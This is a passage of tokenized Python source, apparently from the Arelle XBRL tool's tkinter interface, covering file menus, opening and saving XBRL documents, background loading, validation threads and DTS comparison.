recentFilesMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for i in range ( min ( len ( fileHistory ) , <NUM_LIT:10> ) ) : <EOL> self . recentFilesMenu . add_command ( <EOL> label = fileHistory [ i ] , <EOL> command = lambda j = i : self . fileOpenFile ( self . config [ "<STR_LIT>" ] [ j ] ) ) <EOL> self . fileMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . recentFilesMenu , underline = <NUM_LIT:0> ) <EOL> importHistory = self . config . setdefault ( "<STR_LIT>" , [ ] ) <EOL> self . recentAttachMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for i in range ( min ( len ( importHistory ) , <NUM_LIT:10> ) ) : <EOL> self . recentAttachMenu . add_command ( <EOL> label = importHistory [ i ] , <EOL> command = lambda j = i : self . fileOpenFile ( self . config [ "<STR_LIT>" ] [ j ] , importToDTS = True ) ) <EOL> self . fileMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . recentAttachMenu , underline = <NUM_LIT:0> ) <EOL> self . packagesMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> hasPackages = False <EOL> for i , packageInfo in enumerate ( sorted ( PackageManager . packagesConfig . get ( "<STR_LIT>" , [ ] ) , <EOL> key = lambda packageInfo : packageInfo . get ( "<STR_LIT:name>" ) ) , <EOL> start = <NUM_LIT:1> ) : <EOL> name = packageInfo . get ( "<STR_LIT:name>" , "<STR_LIT>" . format ( i ) ) <EOL> URL = packageInfo . get ( "<STR_LIT>" ) <EOL> if name and URL and packageInfo . get ( "<STR_LIT:status>" ) == "<STR_LIT>" : <EOL> self . packagesMenu . add_command ( <EOL> label = name , <EOL> command = lambda url = URL : self . fileOpenFile ( url ) ) <EOL> hasPackages = True <EOL> if hasPackages : <EOL> self . fileMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . packagesMenu , underline = <NUM_LIT:0> ) <EOL> def onPackageEnablementChanged ( self ) : <EOL> self . loadFileMenuHistory ( ) <EOL> def fileNew ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> self . 
logClear ( ) <EOL> self . dirty = False <EOL> self . filename = None <EOL> self . data = { } <EOL> self . parent . title ( _ ( "<STR_LIT>" ) ) ; <EOL> self . modelManager . load ( None ) ; <EOL> def getViewAndModelXbrl ( self ) : <EOL> view = getattr ( self , "<STR_LIT>" , None ) <EOL> if view : <EOL> modelXbrl = None <EOL> try : <EOL> modelXbrl = view . modelXbrl <EOL> return ( view , modelXbrl ) <EOL> except AttributeError : <EOL> return ( view , None ) <EOL> return ( None , None ) <EOL> def okayToContinue ( self ) : <EOL> view , modelXbrl = self . getViewAndModelXbrl ( ) <EOL> documentIsModified = False <EOL> if view is not None : <EOL> try : <EOL> view . updateInstanceFromFactPrototypes ( ) <EOL> except AttributeError : <EOL> pass <EOL> if modelXbrl is not None : <EOL> documentIsModified = modelXbrl . isModified ( ) <EOL> if not self . dirty and ( not documentIsModified ) : <EOL> return True <EOL> reply = tkinter . messagebox . askokcancel ( <EOL> _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> if reply is None : <EOL> return False <EOL> else : <EOL> return reply <EOL> def fileSave ( self , event = None , view = None , fileType = None , filenameFromInstance = False , * ignore ) : <EOL> if view is None : <EOL> view = getattr ( self , "<STR_LIT>" , None ) <EOL> if view is not None : <EOL> filename = None <EOL> modelXbrl = None <EOL> try : <EOL> modelXbrl = view . modelXbrl <EOL> except AttributeError : <EOL> pass <EOL> if filenameFromInstance : <EOL> try : <EOL> modelXbrl = view . modelXbrl <EOL> filename = modelXbrl . modelDocument . filepath <EOL> if filename . endswith ( '<STR_LIT>' ) : <EOL> filename = None <EOL> except AttributeError : <EOL> pass <EOL> if isinstance ( view , ViewWinRenderedGrid . ViewRenderedGrid ) : <EOL> initialdir = os . path . dirname ( modelXbrl . modelDocument . 
uri ) <EOL> if fileType in ( "<STR_LIT:html>" , "<STR_LIT>" , None ) : <EOL> if fileType == "<STR_LIT:html>" and filename is None : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> elif fileType == "<STR_LIT>" and filename is None : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> else : <EOL> if filename is None : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if filename and ( filename . endswith ( "<STR_LIT>" ) or filename . endswith ( "<STR_LIT>" ) ) : <EOL> view . saveInstance ( filename ) <EOL> return True <EOL> if not filename : <EOL> return False <EOL> try : <EOL> ViewFileRenderedGrid . viewRenderedGrid ( modelXbrl , filename , lang = self . labelLang , sourceView = view ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> elif fileType == "<STR_LIT>" : <EOL> return self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = initialdir , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> elif isinstance ( view , ViewWinTests . ViewTests ) and modelXbrl . modelDocument . type in ( ModelDocument . 
Type . TESTCASESINDEX , ModelDocument . Type . TESTCASE ) : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = os . path . dirname ( self . modelManager . modelXbrl . modelDocument . uri ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> ViewFileTests . viewTests ( self . modelManager . modelXbrl , filename ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> elif isinstance ( view , ViewWinTree . ViewTree ) : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) . format ( view . tabTitle ) , <EOL> initialdir = os . path . dirname ( self . modelManager . modelXbrl . modelDocument . uri ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> if isinstance ( view , ViewWinRoleTypes . ViewRoleTypes ) : <EOL> ViewFileRoleTypes . viewRoleTypes ( modelXbrl , filename , view . tabTitle , view . isArcrole , lang = view . lang ) <EOL> elif isinstance ( view , ViewWinConcepts . ViewConcepts ) : <EOL> ViewFileConcepts . viewConcepts ( modelXbrl , filename , labelrole = view . labelrole , lang = view . lang ) <EOL> elif isinstance ( view , ViewWinFactList . ViewFactList ) : <EOL> ViewFileFactList . viewFacts ( modelXbrl , filename , labelrole = view . labelrole , lang = view . lang ) <EOL> else : <EOL> ViewFileRelationshipSet . viewRelationshipSet ( modelXbrl , filename , view . tabTitle , view . arcrole , labelrole = view . labelrole , lang = view . 
lang ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> elif isinstance ( view , ViewWinXml . ViewXml ) and self . modelManager . modelXbrl . formulaOutputInstance : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = os . path . dirname ( self . modelManager . modelXbrl . modelDocument . uri ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) , ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> from arelle import XmlUtil <EOL> with open ( filename , "<STR_LIT:w>" ) as fh : <EOL> XmlUtil . writexml ( fh , self . modelManager . modelXbrl . formulaOutputInstance . modelDocument . xmlDocument , encoding = "<STR_LIT:utf-8>" ) <EOL> self . addToLog ( _ ( "<STR_LIT>" ) . format ( filename ) ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> self . filename , err ) , <EOL> parent = self . parent ) <EOL> return True <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> '''<STR_LIT>''' <EOL> def fileSaveExistingFile ( self , event = None , view = None , fileType = None , * ignore ) : <EOL> return self . fileSave ( view = view , fileType = fileType , filenameFromInstance = True ) <EOL> def saveDTSpackage ( self ) : <EOL> self . modelManager . saveDTSpackage ( allDTSes = True ) <EOL> def fileOpen ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = self . config . 
setdefault ( "<STR_LIT>" , "<STR_LIT:.>" ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if self . isMSW and "<STR_LIT>" in filename : <EOL> tkinter . messagebox . showerror ( _ ( "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , parent = self . parent ) <EOL> return <EOL> if os . sep == "<STR_LIT:\\>" : <EOL> filename = filename . replace ( "<STR_LIT:/>" , "<STR_LIT:\\>" ) <EOL> self . fileOpenFile ( filename ) <EOL> def importFileOpen ( self , * ignore ) : <EOL> if not self . modelManager . modelXbrl or self . modelManager . modelXbrl . modelDocument . type not in ( <EOL> ModelDocument . Type . SCHEMA , ModelDocument . Type . LINKBASE , ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , parent = self . parent ) <EOL> return False <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = self . config . setdefault ( "<STR_LIT>" , "<STR_LIT:.>" ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if self . isMSW and "<STR_LIT>" in filename : <EOL> tkinter . messagebox . showerror ( _ ( "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , parent = self . parent ) <EOL> return <EOL> if os . sep == "<STR_LIT:\\>" : <EOL> filename = filename . replace ( "<STR_LIT:/>" , "<STR_LIT:\\>" ) <EOL> self . fileOpenFile ( filename , importToDTS = True ) <EOL> def updateFileHistory ( self , url , importToDTS ) : <EOL> key = "<STR_LIT>" if importToDTS else "<STR_LIT>" <EOL> fileHistory = self . config . setdefault ( key , [ ] ) <EOL> while fileHistory . count ( url ) > <NUM_LIT:0> : <EOL> fileHistory . remove ( url ) <EOL> if len ( fileHistory ) > <NUM_LIT:10> : <EOL> fileHistory [ <NUM_LIT:10> : ] = [ ] <EOL> fileHistory . insert ( <NUM_LIT:0> , url ) <EOL> self . config [ key ] = fileHistory <EOL> self . 
loadFileMenuHistory ( ) <EOL> self . saveConfig ( ) <EOL> def fileOpenFile ( self , filename , importToDTS = False , selectTopView = False ) : <EOL> if filename : <EOL> filesource = None <EOL> filesource = openFileSource ( filename , self , <EOL> checkIfXmlIsEis = self . modelManager . disclosureSystem and <EOL> self . modelManager . disclosureSystem . validationType == "<STR_LIT>" ) <EOL> if filesource . isArchive and not filesource . selection : <EOL> from arelle import DialogOpenArchive <EOL> filename = DialogOpenArchive . askArchiveFile ( self , filesource ) <EOL> if filename : <EOL> if importToDTS : <EOL> if not isHttpUrl ( filename ) : <EOL> self . config [ "<STR_LIT>" ] = os . path . dirname ( filename ) <EOL> else : <EOL> if not isHttpUrl ( filename ) : <EOL> self . config [ "<STR_LIT>" ] = os . path . dirname ( filesource . baseurl if filesource . isArchive else filename ) <EOL> self . updateFileHistory ( filename , importToDTS ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundLoadXbrl ( filesource , importToDTS , selectTopView ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def webOpen ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> url = DialogURL . askURL ( self . parent , buttonSEC = True , buttonRSS = True ) <EOL> if url : <EOL> self . updateFileHistory ( url , False ) <EOL> filesource = openFileSource ( url , self ) <EOL> if filesource . isArchive and not filesource . selection : <EOL> from arelle import DialogOpenArchive <EOL> url = DialogOpenArchive . askArchiveFile ( self , filesource ) <EOL> self . updateFileHistory ( url , False ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundLoadXbrl ( filesource , False , False ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def importWebOpen ( self , * ignore ) : <EOL> if not self . modelManager . modelXbrl or self . modelManager . modelXbrl . modelDocument . type not in ( <EOL> ModelDocument . 
Type . SCHEMA , ModelDocument . Type . LINKBASE , ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , parent = self . parent ) <EOL> return False <EOL> url = DialogURL . askURL ( self . parent , buttonSEC = False , buttonRSS = False ) <EOL> if url : <EOL> self . fileOpenFile ( url , importToDTS = True ) <EOL> def backgroundLoadXbrl ( self , filesource , importToDTS , selectTopView ) : <EOL> startedAt = time . time ( ) <EOL> try : <EOL> if importToDTS : <EOL> action = _ ( "<STR_LIT>" ) <EOL> profileStat = "<STR_LIT>" <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl : <EOL> ModelDocument . load ( modelXbrl , filesource . url , isSupplemental = importToDTS ) <EOL> modelXbrl . relationshipSets . clear ( ) <EOL> else : <EOL> action = _ ( "<STR_LIT>" ) <EOL> profileStat = "<STR_LIT>" <EOL> modelXbrl = self . modelManager . load ( filesource , _ ( "<STR_LIT>" ) ) <EOL> except ModelDocument . LoadingException : <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> return <EOL> except Exception as err : <EOL> msg = _ ( "<STR_LIT>" ) . format ( <EOL> filesource . url , <EOL> err , <EOL> traceback . format_tb ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) ) <EOL> self . addToLog ( msg ) ; <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> return <EOL> if modelXbrl and modelXbrl . modelDocument : <EOL> statTime = time . time ( ) - startedAt <EOL> modelXbrl . profileStat ( profileStat , statTime ) <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> ( action , statTime ) ) ) <EOL> if modelXbrl . hasTableRendering : <EOL> self . showStatus ( _ ( "<STR_LIT>" ) ) <EOL> RenderingEvaluator . init ( modelXbrl ) <EOL> self . showStatus ( _ ( "<STR_LIT>" ) . format ( action ) ) <EOL> self . waitForUiThreadQueue ( ) <EOL> self . uiThreadQueue . put ( ( self . 
showLoadedXbrl , [ modelXbrl , importToDTS , selectTopView ] ) ) <EOL> else : <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> ( action , time . time ( ) - startedAt ) ) ) <EOL> def showLoadedXbrl ( self , modelXbrl , attach , selectTopView = False ) : <EOL> startedAt = time . time ( ) <EOL> currentAction = "<STR_LIT>" <EOL> topView = None <EOL> self . currentView = None <EOL> try : <EOL> if attach : <EOL> modelXbrl . closeViews ( ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) . format ( <EOL> os . path . basename ( modelXbrl . modelDocument . uri ) ) ) <EOL> self . setValidateTooltipText ( ) <EOL> if modelXbrl . modelDocument . type in ModelDocument . Type . TESTCASETYPES : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinTests . viewTests ( modelXbrl , self . tabWinTopRt ) <EOL> topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> elif modelXbrl . modelDocument . type == ModelDocument . Type . VERSIONINGREPORT : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinVersReport . viewVersReport ( modelXbrl , self . tabWinTopRt ) <EOL> from arelle . ViewWinDiffs import ViewWinDiffs <EOL> ViewWinDiffs ( modelXbrl , self . tabWinBtm , lang = self . labelLang ) <EOL> elif modelXbrl . modelDocument . type == ModelDocument . Type . RSSFEED : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRssFeed . viewRssFeed ( modelXbrl , self . tabWinTopRt ) <EOL> topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> else : <EOL> if modelXbrl . hasTableIndexing : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopLeft , ( "<STR_LIT>" , ( XbrlConst . euGroupTable , ) ) , lang = self . labelLang , <EOL> treeColHdr = "<STR_LIT>" , showLinkroles = False , showColumns = False , expandAll = True ) <EOL> elif modelXbrl . modelDocument . type in ( ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL , ModelDocument . Type . 
INLINEXBRLDOCUMENTSET ) : <EOL> currentAction = "<STR_LIT>" <EOL> firstTableLinkroleURI , indexLinkroleURI = TableStructure . evaluateTableIndex ( modelXbrl ) <EOL> if firstTableLinkroleURI : <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopLeft , ( "<STR_LIT>" , ( XbrlConst . parentChild , ) ) , lang = self . labelLang , linkrole = indexLinkroleURI , <EOL> treeColHdr = "<STR_LIT>" , showRelationships = False , showColumns = False , expandAll = False , hasTableIndex = True ) <EOL> '''<STR_LIT>''' <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinDTS . viewDTS ( modelXbrl , self . tabWinTopLeft , altTabWin = self . tabWinTopRt ) <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinConcepts . viewConcepts ( modelXbrl , self . tabWinBtm , "<STR_LIT>" , lang = self . labelLang , altTabWin = self . tabWinTopRt ) <EOL> if modelXbrl . hasTableRendering : <EOL> ViewWinRenderedGrid . viewRenderedGrid ( modelXbrl , self . tabWinTopRt , lang = self . labelLang ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> if modelXbrl . modelDocument . type in ( ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL , ModelDocument . Type . INLINEXBRLDOCUMENTSET ) : <EOL> currentAction = "<STR_LIT>" <EOL> if not modelXbrl . hasTableRendering : <EOL> ViewWinFactTable . viewFacts ( modelXbrl , self . tabWinTopRt , linkrole = firstTableLinkroleURI , lang = self . labelLang , expandAll = firstTableLinkroleURI ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinFactList . viewFacts ( modelXbrl , self . tabWinTopRt , lang = self . labelLang ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> if modelXbrl . hasFormulae : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinFormulae . viewFormulae ( modelXbrl , self . tabWinTopRt ) <EOL> if topView is None : topView = modelXbrl . 
views [ - <NUM_LIT:1> ] <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , XbrlConst . parentChild , lang = self . labelLang ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , XbrlConst . summationItem , lang = self . labelLang ) <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , "<STR_LIT>" , lang = self . labelLang ) <EOL> if modelXbrl . hasTableRendering : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , "<STR_LIT>" , lang = self . labelLang ) <EOL> for name , arcroles in sorted ( self . config . get ( "<STR_LIT>" , { } ) . items ( ) ) : <EOL> if XbrlConst . arcroleGroupDetect in arcroles : <EOL> currentAction = name + "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , ( name , arcroles ) , lang = self . labelLang ) <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinProperties . viewProperties ( modelXbrl , self . tabWinTopLeft ) <EOL> currentAction = "<STR_LIT>" <EOL> viewTime = time . time ( ) - startedAt <EOL> modelXbrl . profileStat ( "<STR_LIT>" , viewTime ) <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , viewTime ) ) <EOL> if selectTopView and topView : <EOL> topView . select ( ) <EOL> self . currentView = topView <EOL> for xbrlLoadedMethod in pluginClassMethods ( "<STR_LIT>" ) : <EOL> xbrlLoadedMethod ( self , modelXbrl , attach ) <EOL> except Exception as err : <EOL> msg = _ ( "<STR_LIT>" ) . format ( <EOL> currentAction , <EOL> err , <EOL> traceback . format_tb ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) ) <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , msg , parent = self . parent ) <EOL> self . 
addToLog ( msg ) ; <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def showFormulaOutputInstance ( self , priorOutputInstance , currentOutputInstance ) : <EOL> currentAction = "<STR_LIT>" <EOL> try : <EOL> if priorOutputInstance : <EOL> priorOutputInstance . close ( ) <EOL> currentAction = "<STR_LIT>" <EOL> if currentOutputInstance : <EOL> ViewWinXml . viewXml ( currentOutputInstance , self . tabWinBtm , "<STR_LIT>" , currentOutputInstance . modelDocument . xmlDocument ) <EOL> except Exception as err : <EOL> msg = _ ( "<STR_LIT>" ) . format ( <EOL> currentAction , <EOL> err , <EOL> traceback . format_tb ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) ) <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , msg , parent = self . parent ) <EOL> self . addToLog ( msg ) ; <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def showProfileStats ( self ) : <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl and self . modelManager . collectProfileStats : <EOL> modelXbrl . logProfileStats ( ) <EOL> def clearProfileStats ( self ) : <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl and self . modelManager . collectProfileStats : <EOL> modelXbrl . profileStats . clear ( ) <EOL> def fileClose ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> self . modelManager . close ( ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) ) <EOL> self . setValidateTooltipText ( ) <EOL> self . currentView = None <EOL> def validate ( self ) : <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl : <EOL> if ( modelXbrl . modelManager . validateDisclosureSystem and <EOL> not modelXbrl . modelManager . disclosureSystem . selection ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> else : <EOL> if modelXbrl . modelDocument . type in ModelDocument . Type . 
TESTCASETYPES : <EOL> for pluginXbrlMethod in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginXbrlMethod ( self , None , modelXbrl ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundValidate ( ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def backgroundValidate ( self ) : <EOL> startedAt = time . time ( ) <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> priorOutputInstance = modelXbrl . formulaOutputInstance <EOL> modelXbrl . formulaOutputInstance = None <EOL> self . modelManager . validate ( ) <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> time . time ( ) - startedAt ) ) <EOL> if not modelXbrl . isClosed and ( priorOutputInstance or modelXbrl . formulaOutputInstance ) : <EOL> self . uiThreadQueue . put ( ( self . showFormulaOutputInstance , [ priorOutputInstance , modelXbrl . formulaOutputInstance ] ) ) <EOL> self . uiThreadQueue . put ( ( self . logSelect , [ ] ) ) <EOL> def compareDTSes ( self ) : <EOL> countLoadedDTSes = len ( self . modelManager . loadedModelXbrls ) <EOL> if countLoadedDTSes != <NUM_LIT:2> : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( countLoadedDTSes ) , <EOL> parent = self . parent ) <EOL> return False <EOL> versReportFile = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = self . config . setdefault ( "<STR_LIT>" , "<STR_LIT:.>" ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not versReportFile : <EOL> return False <EOL> self . config [ "<STR_LIT>" ] = os . path . dirname ( versReportFile ) <EOL> self . saveConfig ( ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundCompareDTSes ( versReportFile ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def backgroundCompareDTSes ( self , versReportFile ) : <EOL> startedAt = time . 
time ( ) <EOL> modelVersReport = self . modelManager . compareDTSes ( versReportFile ) <EOL> if modelVersReport and modelVersReport . modelDocument : <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> time . time ( ) - startedAt ) ) <EOL> self . uiThreadQueue . put ( ( self . showComparedDTSes , [ modelVersReport ] ) ) <EOL> def showComparedDTSes ( self , modelVersReport ) : <EOL> modelVersReport . modelDocument . fromDTS . closeViews ( ) <EOL> modelVersReport . modelDocument . toDTS . closeViews ( ) <EOL> self . showLoadedXbrl ( modelVersReport , True ) <EOL> def loadFile ( self , filename ) : <EOL> self . filename = filename <EOL> self . listBox . delete ( <NUM_LIT:0> , END ) <EOL> self . dirty = False <EOL> try : <EOL> with open ( self . filename , "<STR_LIT:rb>" ) as fh : <EOL> self . data = pickle . load ( fh ) <EOL> for name in sorted ( self . data , key = str . lower ) : <EOL> self . listBox . insert ( END , name ) <EOL> self . showStatus ( _ ( "<STR_LIT>" ) . format ( <EOL> self . listbox . size ( ) , <EOL> self . filename ) , clearAfter = <NUM_LIT> ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) . format ( <EOL> os . path . basename ( self . filename ) ) ) <EOL> except ( EnvironmentError , pickle . PickleError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> self . filename , <EOL> err ) , <EOL> parent = self . parent ) <EOL> def quit ( self , event = None , restartAfterQuit = False ) : <EOL> if self . okayToContinue ( ) : <EOL> self . modelManager . close ( ) <EOL> logging . shutdown ( ) <EOL> global restartMain <EOL> restartMain = restartAfterQuit <EOL> state = self . parent . state ( ) <EOL> if state == "<STR_LIT>" : <EOL> self . config [ "<STR_LIT>" ] = self . parent . geometry ( ) <EOL> if state in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . config [ "<STR_LIT>" ] = state <EOL> if self . 
